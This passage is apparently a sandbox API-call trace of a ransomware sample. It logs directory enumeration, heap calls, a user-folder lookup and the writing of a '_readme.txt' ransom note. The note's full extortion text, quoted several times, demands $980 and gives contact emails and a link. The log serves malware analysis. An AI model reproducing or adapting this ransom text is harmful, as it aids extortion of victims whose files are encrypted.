ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x3282668 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2040 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ca8 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1848 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac18c0 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15c8 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a50 [0142.648] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a78 [0142.648] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1b18 [0142.648] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3255a48 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d70 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21f8 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1410 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1be0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15f0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cd0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2108 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac13e8 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c30 [0142.649] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a78 [0142.649] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.649] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a50 [0142.649] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0142.649] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x32830c8 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15c8 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac18c0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1848 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ca8 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2040 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1dc0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1528 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1b68 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac20e0 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2158 [0142.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ff0 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1348 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1550 [0142.650] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.650] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a78 [0142.650] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1b18 [0142.650] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c30 [0142.650] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac13e8 [0142.650] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x310) returned 0x3290eb8 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2108 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cd0 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15f0 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1be0 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1410 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21f8 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d70 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ac8 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2248 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1e10 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1870 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1fc8 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2068 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1320 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2270 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1eb0 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac13c0 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1618 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1438 [0142.651] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c30 [0142.651] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1b18 [0142.651] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a78 [0142.652] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0142.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.652] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89f6490, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc89f6490, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89f6490, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.652] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89f6490, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc89f6490, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89f6490, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.652] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.652] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.652] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0142.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.652] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.652] PathFindFileNameW (pszPath="") returned="" [0142.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.652] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.653] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.653] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aafb40 [0142.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a50 [0142.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1550 [0142.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1910 | out: hHeap=0x620000) returned 1 [0142.653] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a50 | out: hHeap=0x620000) returned 1 [0142.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1550 | out: hHeap=0x620000) returned 1 [0142.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1550 [0142.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x9aafb40 [0142.653] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0142.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1550 | out: hHeap=0x620000) returned 1 [0142.653] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0142.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.654] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 